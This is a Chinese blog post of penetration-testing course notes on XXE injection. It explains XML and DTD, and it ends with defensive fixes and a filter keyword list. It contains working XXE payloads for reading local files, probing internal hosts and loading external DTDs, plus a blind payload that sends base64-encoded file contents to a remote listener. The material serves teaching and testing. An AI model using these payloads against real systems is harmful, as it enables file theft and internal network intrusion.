WEB漏洞-XXE&XML之利用检测绕过

最新推荐文章于 2024-06-03 07:00:00 发布
最新推荐文章于 2024-06-03 07:00:00 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: 渗透测试 网络安全 文章标签: xml XXE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19446965/article/details/119187665
版权

 免责声明: 本内容仅为【小迪安全-web渗透测试】的学习笔记,仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。

什么是XML?参考文档

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。

XML与HTML对比

XML被设计为传输和存储数据,其焦点是数据的内容。

HTML被设计为显示数据,其焦点是数据的外观。

XML旨在传输信息,HTML旨在传输信息。

Xml典型代码:

<!--XML声明-->
<?xml version="1.0"?>
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)> <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)> <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)> <!--定义body元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

XXE漏洞

XXE漏洞全称XML External Entity Injection,即外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁用外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

各脚本支持的协议

 

存在xxe的情况下:

玩法-读文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d://test.txt"> 
]>
<x>&xxe; &xxe;</x>
//xxe为变量,读取test.txt
//打印出来

用file协议读指定路径的文件

显示结果:

玩法-内网探针或攻击内网应用(触发漏洞地址)内网探针

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.33.130:80/cookie.txt" >
]>
<x>&rabbit;</x>

引入外部实体dtd,dtd就是xml的后缀,识别为xml格式

如果设置了禁止外部实体引用,将会失效

<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
%file;
]>
<x>&send;</x>

可以在远程服务器evil2.dtd写上:

<!ENTITY send SYSTEM "file:///d:/test.txt">

无回显-读取文件

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.0.103:8081/test.dtd">
%dtd;
%send;
]>

Base64加密是反正传输中乱码,传输失败。

本地192.168.0.103上构造:

test.dtd:

<!ENTITY % payload
"<!ENTITY % send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
>
%payload;

开启日志,看日志就可以看到test.txt数据了。

协议-读文件(绕过)

参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<x>&f;</x>

如何检测:

  1. 数据格式类型:如果发现有<user>test</user><pass>Mikasa</pass>  类型
  2. 抓包发现  content-type中是  text/xml  或者 application/xml
  3. 盲猜:更改content-type值application/xml看返回

burp上抓包 右键

do an active scan:扫描漏洞

Send to spider:爬行

利用爬行,找到有xml,把xml代码拷贝到post上既可以利用

实践:

CTF-Vulnhub-XXE安全真题复现

例子:

扫描IP及端口->扫描探针目录->抓包探针xxe安全->利用xxe读取源码->flag指向文件->base32 64解密->php运行->flag

xxe安全漏洞自动化注射脚本工具-XXEinjector(Ruby)

https://www.cnblogs.com/bmjoker/p/9614990.html
xxe_payload_fuzz

很多靶场镜像的网站:

https://download.vulnhub.com

xxe漏洞修复与防御方案-php,java,python-过滤及禁用

方案1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案2-过滤用户提交的XML数据

过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC

涉及资源:

https://github.com/c0ny1/xxe-lab

https://download.vulnhub.com/xxe/XXE.zip   //靶场

https://github.com/enjoiz/XXEinjector

https://www.cnblogs.com/bmjoker/p/9614990.html  //xxe注入工具

https://www.cnblogs.com/20175211lyz/p/11413335.html  //介绍xxe

 本文来自:

http://www.pingtaimeng.com/article/detail/id/1554938
https://www.cnblogs.com/trevain/p/13651273.html
https://blog.51cto.com/u_15162069/2774409

Rnan-prince
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE&XML利用检测
ssrf
02-15 87
目录XXE&XML利用检测如何查找该漏洞XXE&XML利用检测 如何查找该漏洞? 查看请求的数据包中是否有xml格式的数据。 如果有就可以构造payload发起请求,观察响应结果。 造成该漏洞的原因就是对于该格式的请求数据没有进行严格的过滤。 ...
Web服务的XML注入攻击检测
02-24
Web服务的XML注入攻击检测
XML 相关漏洞风险研究
最新发布
有价值炮灰
06-03 1775
使用了这么久 XML,但是对其内部细节却不甚了解,本文就来补全这个缺憾。
Xml实体注入漏洞姿势总结
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 5523
Xml实体注入漏洞姿势总结
XXE技巧拓展】————4、XML实体注入漏洞利用与学习
Fly_鹏程万里
12-25 502
前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发的安全问题. 在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安...
WEB 漏洞-XXE&XML利用检测绕过
硫酸超的博客
08-29 613
WEB 漏洞-XXE&XML利用检测绕过XXE&XMLDTD内部的 DOCTYPE 声明外部DOCTYPE声明内部实体声明外部实体声明为什么使用 DTDpikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入回显玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)引入外部实体 dtd不回显读取文件xxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题复现-检测,利用,拓展,实战CTF-Jarvis-OJ-Web-XXE 安全真题复
第39天:WEB漏洞-XXE&XML利用检测绕过全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
web渗透系列教学下载共64份.zip
12-30
web渗透系列教学下载共64份: 内容如下; web渗透--1--web安全原则.pdf ...web渗透--64--常见的WAF绕过方法.pdf web渗透--7--识别web应用框架.pdf web渗透--8--配置管理测试.pdf web渗透--9--身份管理测试.pdf
CTF Web各种题目的解题姿势
07-27
课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-...
超全的Web渗透自我学习资料合集(64篇).zip
09-30
超全的Web渗透学习资料合集,共64篇。 web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 ...web渗透: 常见的WAF绕过方法
(39.1)【XML漏洞专题】必备的基础知识、利用原理、构建规则
04-24 1828
【专题】XML利用必备基础知识
XXE&XML漏洞利用 pikachu
weixin_54431413的博客
04-23 952
一、XXEXML概念 (1)XML XML 指可扩展标记语言(EXtensible Markup Language)。 XML 是一种很像HTML的标记语言。 XML 的设计宗旨是传输数据,而不是显示数据。 (2)XXE XXE 漏洞全称 XML External Entity Injection,即 xml 外部实体注入漏洞 XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,没有进行严格的过滤,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等
渗透测试-xml注入以及xxe漏洞
lza20001103的博客
07-20 1019
渗透测试-xml注入以及xxe漏洞
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 823
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXEXML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XXE漏洞01】XML漏洞原理及实验
Fighting_hawk的博客
03-21 2952
1. 了解XXE的内容和原理。 2. 掌握XXE漏洞利用方法。 3. 掌握XXE漏洞的修改建议。
XXEXML利用绕过
qq_49078152的博客
07-19 815
XXEXML
小迪安全学习笔记--第39天--XXEXML利用检测绕过全解
zr1213159840的博客
02-09 1175
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 DTD 文档类型定义(DTD)可定义合法的XML文档构建模块 它使用一系列合法的元素来.
XML外部实体注入——XXE漏洞详解
Gefangenes的博客
07-02 2062
首先要了解什么是XXE漏洞,首先应该了解一下什么是XMLXML(可扩展标记语言,英文全称:eXtensible Markup Language)是一种用于描述数据结构和交换数据的标记语言。XML是一种非常灵活的语言,可以用于描述各种类型的数据,如文档、图像、音频、视频等。这个解释太官方,我们可以将xml语言和html对比着再来解释一下1>xml仅仅是纯文本,他不会做任何事情2>xml可以自己发明标签(允许定义自己的标签和文档结构)3>专门用来存放传输数据的东西。
web中间件常见漏洞
09-02
常见的Web中间件漏洞包括: 1. 跨站脚本攻击 (XSS):攻击者通过在Web应用程序中注入恶意脚本,从而在用户浏览器中执行恶意代码。 2. 跨站请求伪造 (CSRF):攻击者利用被攻击用户的身份,发送恶意请求来执行未经授权的操作。 3. SQL注入:攻击者通过在用户输入中注入恶意SQL代码,从而对数据库进行非法操作或获取敏感信息。 4. 远程代码执行 (RCE):攻击者能够在服务器上执行任意的系统命令或代码,从而完全控制服务器。 5. 目录遍历:攻击者通过修改URL或请求参数来访问应用程序的敏感文件或目录。 6. 未经身份验证的访问:未正确配置身份验证机制或权限控制,导致攻击者可以绕过身份验证访问受限资源。 7. 文件上传漏洞:未正确验证上传文件的类型、大小或内容,导致攻击者能够上传恶意文件并执行任意代码。 8. XML外部实体攻击 (XXE):攻击者利用XML解析器的特性,通过引用外部实体来读取敏感文件或进行其他恶意操作。 这些只是一些常见的Web中间件漏洞,实际上还有其他类型的漏洞存在。为了保护Web应用程序安全,开发人员应该注意并修复这些漏洞,并采取安全的编码实践和防御措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值